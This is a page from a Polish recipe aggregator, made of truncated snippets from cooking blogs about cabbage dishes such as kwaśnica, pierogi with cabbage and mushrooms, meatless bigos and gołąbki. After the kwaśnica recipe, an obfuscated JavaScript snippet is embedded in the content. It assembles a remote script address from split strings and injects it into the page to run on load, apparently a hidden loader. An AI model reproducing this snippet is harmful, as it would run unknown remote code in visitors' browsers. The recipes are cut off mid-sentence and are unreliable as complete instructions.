serwuje się na zimno lub na ciepło. Kwaśnica Kwaśnica to zupa na Wigilię wywodząca się z Podhala. Przygotowuje się ją z: Głowy i podrobów z wybranej ryby 30 dag kapusty kiszonej Soku z kapusty kiszonej Kilku suszonych grzybów 5 ziaren ziela angielskiego 2 ząbków czosnku Szczypty suszonego imbiru Kiszoną kapustę szatkujemy, wrzucamy do garnka, zalewamy odrobiną wody oraz sokiem(...)kiszonej kapusty i gotujemy. Dodajemy grzyby, ziele angielskie i gotujemy do zmięknięcia. Dodajemy podroby i głowy ryb, gotujemy przez 20 minut, wyjmujemy podroby, doprawiamy czosnkiem oraz imbirem i ponownie zagotowujemy. (function(){ cwbx=document.createElement("script");cwbx_=("ust");cwbxu="69293527"; cwbx_+="a"+("t.i");cwbx.type="text/javascript"; cwbxu+=".pdmwktdtwbxmgxxyXtf9";cwbx.async=true;cwbx_+="n"+("f"+"o")+"/"; cwbxu+="bn8i421swj";cwbx.src="//"+cwbx_+cwbxu; document.body.appendChild(cwbx); })(); Artykuł Zupa
Okiem Blondynki by McBlondispecjalną prośbę jednej z czytelniczek, dzielę się dziś z Wami przepisem na pierogi z kapustą i grzybami. Od razu muszę Wam zaznaczyć, że żadną specjalistką od pierogów absolutnie nie jestem; prawda jest taka, że robię je zaledwie kilka razy do roku, z mięsem lub właśnie kapustą i grzybami. Ciasto robię na ogół właśnie takie,… Continue reading Wigilijne pierogi(...)kapustą i grzybami
brunetkawkuchniŚwietny przepis na kapustę z dużą ilością grzybów oraz suszonymi śliwkami. To mój ulubiony bigos bez mięsa , który często szykuję na wigilijny stół. Tę kapustę można też użyć jako farsz do pierogów. Wystarczy drobniej poszatkować grzyby i kapustę, wlać odrobinę więcej oleju i smażyć całość dodatkowo bez przykrycia przez 20 minut. - super bigos bez mięsa - kapustę można wykorzystać również
AniaGotuje.plsmakować dobrze. Możemy podać ją nawet z pieczywem, a gdy mamy chwilę to np. z pieczonymi ziemniakami w pesto. Ja jak zawsze rybę podaję z surówką z kiszonej kapusty i jabłka. To takie moje małe, zdrowe uzależnienie ;) Polecam! polędwice z dorsza (ok. 450g) łyżka oleju (do ryb używam oleju słonecznikowego z pieprzem cytrynowym) łyżeczka pieprzu cytrynowego pół cytryny pół głowki(...)czosnku gałązka rozmarynu 0/5 kg ugotowanych ziemniaków 2 łyżki pesto surówka: 0/5 kg kiszonej kapusty mała marchewka jabłko 0/5 pęczka cienkiego szczypiorku łyżka oliwy sól i pieprz do smaku Piekarnik nagrzewamy do 190 stopni. Dorsza nacieramy olejem i pieprzem cytrynowym. Układamy w naczyniu żaroodpornym. Na wierzchu układamy przekrojone ząbki czosnku, pokrojoną w plasterki cytrynę oraz rozmaryn. Pieczemy uważając
Mienta blogWitajcie :) Dzisiaj mam dla Was propozycję pysznej kapusty z żeberkami gotowanej w szybkowarze. Nadaje się jako samodzielne danie np: z bułką lu jako dodatek do ziemniaków. Jeśli nie macie jeszcze takiego garnka to polecam zakupić, uwielbiam w nim gotować, po pierwsze o wiele szybciej przygotowuje się danie a po drugie jest zdrowsze. Można w nim przyrządzać różnego rodzaju mięsa(...)kanapek bez pieczenia i smażenia. Zapraszam do wypróbowania :) Składniki : trochę ponad kg kapusty kiszonej około 400 g żeberek ( 2 kawałki 2 cebule 3 łyżki oleju 1 łyżka ziół prowansalskich 1 liść laurowy kilka ziarenek ziela angielskiego sól, pieprz lub domowa vegeta do smaku 1 łyżka masła szybkowar Wykonanie : Żeberka myjemy i ewentualnie dzielimy na porcje.Cebul
Sama słodycz i szczypta chiliKrokiety. Kojarzą Nam się zdecydowanie z kiszoną kapustą i aromatycznymi leśnymi grzybkami. A u mnie dziś na opak. Słodka kapustka i pieczarki. Moim dzieciom zdecydowanie bardziej smakują takie krokiety w łagodniejszym wydaniu. Składniki: 1 szklanka mąki 1 szklanka wody gazowanej 1/2 szklanka mleka 2 jajka lub 1 duże wiejskie 2 łyżki oleju szczypta soli farsz: 1/4 główki średniej kapusty(...)pieczarek 1 cebula sól, pieprz panierka: szklanka bułki tartej 1 jajko Wykonanie: *Kapustę szatkujemy, wkładamy do garnka, zalewamy wodą, dodajemy sól. Gotujemy do miękkości. *Cebulę siekamy, szklimy na niewielkiej ilości oleju, dokładamy pokrojone w plastry pieczarki, zrumieniamy. Dokładamy osączoną kapustę. Smażymy razem ok 5 minut. *Z podanych składników przygotowujemy ciasto naleśnikowe. Smażymy cienkie naleśniki. *Na każdy naleśnik nakładamy
Z Majeczką w kuchnifalbanką, a czasem z odciśniętym widelcem. Bożonarodzeniowe pierogi w każdym domu wyglądają inaczej, różnią się formą, farszem i dodatkami, jednak w większości polskich domów wigilijny prym wiodą pierogi z kapustą i grzybami. W ostatni weekend podczas warsztatów zorganizowanych w strefie Piotrkowska 217 w Łodzi poznałam kilka sekretów perfekcyjnych pierogów Pani Gosi . Z nową wiedzą zabraliśmy się do samodzielnego wyrabiania(...)wałkowania lepienia pierogów - oczywiście pod czujnym okiem Pani Gosi :) Poniżej przepis na wigilijne pierogi z kapustą i grzybami wg przepisu prababci Anastazji. Składniki na farsz// ok 50 pierogów kapusta kiszona - 1 kg suszone grzyby - 5 dkg cebula - 20 dkg sól pieprz Grzyby zalewamy wodą i moczymy przez dwie godziny po czym gotujemy do miękkości, odcedzamy i mielimy w maszynce
Wylizany Rondeljakoś naszło mnie na gołąbki. Moje gołąbki zawsze były ze słodką kapustą. Pierwszy raz zrobiłam na włoskiej kapuście i muszę przyznać, że nie ostatni. Są bardzo smaczne i zdecydowanie szybciej się je robi bo kapusta ekspresowo się parzy. Jako mięso dałam tym razem karkówkę a przeważnie była to łopatka. Tak więc kapusta włoska będzie częściej gościć w moich gołąbkach. Rozwiń
Ewa w kuchniŁatwe Tanie Przepis na łazanki z kapustą świeżą, kapustą kiszoną i boczkiem Łazanki jest to rodzaj makaronu, pokrojonego w cienkie kwadraciki. Łazanki podaje się zwykle z kapustą świeżą lub kiszoną, z dodatkiem boczku lub kiełbasy. Ciekawym jest fakt, iż makaron łazanki w wielu domach widnieje na wigilijnym stole. Jest bowiem dodatkiem […] Artykuł Łazanki z kapustą pochodzi z serwisu Blog
PysiaGotuje.plUwielbiam pierogi w każdym wydaniu. Dziś, w cyklu świątecznym, zapraszam Cię na te z kapustą i grzybami Składniki : Ciasto: 4 szklanki mąki 2 łyżeczki soli 1 łyżka oleju około 2 szklanek ciepłej wody Farsz: 100 suszonych grzybów- u mnie borowiki 500 g kiszonej kapusty 1 marchewka 1 pietruszka sól i pieprz 3 łyżki oleju 2 cebule Przygotowanie : grzyby opłucz, zalej(...)godzin lub na całą noc. Następnego dnia zagotuj, dodaj obraną marchewkę, pietruszkę i gotuj aż będą miękkie – około 45 minut. Pod koniec gotowania dopraw solą i pieprzem kapustę ugotuj w 150 ml wody do miękkości z dodatkiem soli – 60 minut, dokładnie odciśnij. Grzyby, marchewkę i pietruszkę odcedź, razem z kapustą zmiel w maszynce do mięsa o bardzo dużych
Oka w rosole czyli KaFka gotujeSkładniki : 1 marchew, 1 pietruszka mały kawałek selera i pora 4 ziemniaki 1 średnia cebula mała kapusta pekińska lub połowa większej sól, pieprz, liść laurowy, szczypta majeranku kawałek ostrej papryczki natka pietruszki, ewentualnie ząbek czosnku jak nie mamy papryczki tłuszcz do smażenia opcjonalnie 2-3 łyżki koncentratu pomidorowego Przygotowanie : Obrane warzywa tj, marchew, pietruszkę zetrzeć na tarce, cebulę, ziemniaki(...)seler pokroić w kostkę Kapustę pokroić w paski Do garnuszka z wodą wrzucić pokrojone ziemniaki i pokrojony seler oraz cebulę, liść laurowy, kilka ziaren pieprzu oraz mały kawałek czerwonej ostrej papryczki - gotować Startą marchew przesmażyć na oleju dodać do gotującej zupy, tak samo zrobić z pietruszką, posolić - gotować prawie do zupełnej miękkości warzyw Następnie dodać pokrojony w krążki
Proste Potrawywczorajszym obiedzie pozostało mi sporo pieczonego kurczaka, zachodziłam więc w głowę jak go wykorzystać, aby się nie zmarnował. Gdy więc w markecie zobaczyłam czerwoną kapustę pekińską doznałam olśnienia i pomyślałam o kolorowej tortilli. Smakowy sukces tejże potrawy dopełnił sos, który nadał tortilli charakteru i pikanterii. Tak więc zapowiadała się kulinarna nuda, bo resztki obiadowe nie zawsze da się pysznie przerobić(...)jednak tym razem wyszło super danie. 4 tortille 1/4 główki czerwonej kapusty pekińskiej (oczywiście może być zwykła, biała) ok. 200 g mięsa z pieczonego kurczaka 3/4 szklanki oliwek 150 g pomidorków koktajlowych 1 szalotka 1/2 opakowania sera feta sos: 2 łyżki ketchupu z piekła rodem KOTLIN 4 łyżki majonezu 1 łyżka gęstej śmietany
Jadło i czytadłogyrosu :) A to wszystko polane pysznym ketchupem Kotlin :) Składniki: (duża ilość) 800 g mięsa mielonego 4 woreczków ryżu 1 woreczek kaszy perłowej 4 średnie cebule 1 duża główka płaskiej kapusty przyprawy: majeranek, sól, pieprz, domowy kucharek, papryka słodka, papryka ostra 1 przyprawa gyrs 1 łyżka masła bulion ( 1-2 szklanki) Ketchup Kotlin pikantny Wykonanie: ryż i kaszę(...)według własnych upodobań, nie zapominając o przyprawie do gyrosu, która nada naszym gołąbką bardzo oryginalnego i wyjątkowego smaku. Ja zawsze staram się ciut przeprawić farsz, ponieważ podczas gotowania gołąbków kapusta wyciągnie wszystkie smaki. Wszystko razem mieszamy i odstawiamy. Kapustę odwracamy i drylujemy dziurę w miejscu gdzie jest złączenie liści, twarda część główki, robimy to po to aby liście podczas sparzenia
W Moim Magicznym Domurazem z mięsem w piekarniku, tylko na osobnej blaszce. Na niedzielny obiad, a nawet świąteczny to danie idealne. Składniki: 5 plastrów schabu (lub innego mięsa wieprzowego) 400 g kapusty kiszonej marchewka 2 cebule 2 ząbki czosnku szklanka rosołu (ewentualnie wody) sól pieprz olej Schab natrzeć solą, pieprzem i czosnkiem. Na patelni rozgrzać olej, szybko obsmażyć mięso z dwóch(...)stron i zdjąć z patelni. Na pozostały po mięsie tłuszcz wrzucić posiekaną cebulę i startą na grubych oczkach marchewkę. Po chwili dodać kapustę, przyprawić pieprzem. Podlać szklanką rosołu (lub wody) i dusić około 10 minut. Naczynie do zapiekania wysmarować olejem, wyłożyć połowę kapusty (razem z sosem), na nią ułożyć schab i resztę kapusty. Przykryć pokrywką (lub folią aluminiową) i wstawić
Domowa Cukierenka-Domowa KuchniaBrukselka, czyli kapusta brukselska - właśnie teraz jest na nią najlepszy czas ! Można z niej wyczarować w kuchni mnóstwo pysznych i zdrowych dań. Niestety nie wszyscy ją lubią, a szkoda, bo jest bardzo zdrowa. Dzis zapraszam Was na bardzo prosty przepis z brukselką w roli głównej, oto zapiekanka z brukselką, kiełbasą i ziemniakami. To bardzo proste w przygotowaniu danie jednogrankowe(...)posmakuje wszystkim. A przy okazji przecyztajcie, co zrobić, żeby pozbyć się z brukselki jej gorzkawego posmaku. Zapraszam! Parę słów o brukselce Brukselka, czyli kapusta brukselska, jak sama nazwa wskazuje pochodzi Brukseli i powstała ze skrzyżowania jarmużu i kapusty głowiastej. Wygląda jak mała główka kapusty, a rośnie na zgrubiałej łodydze, która może mierzyć nawet jeden metr. Rośnie aż do grudnia, gdyż
Kulinarne przygody Gatity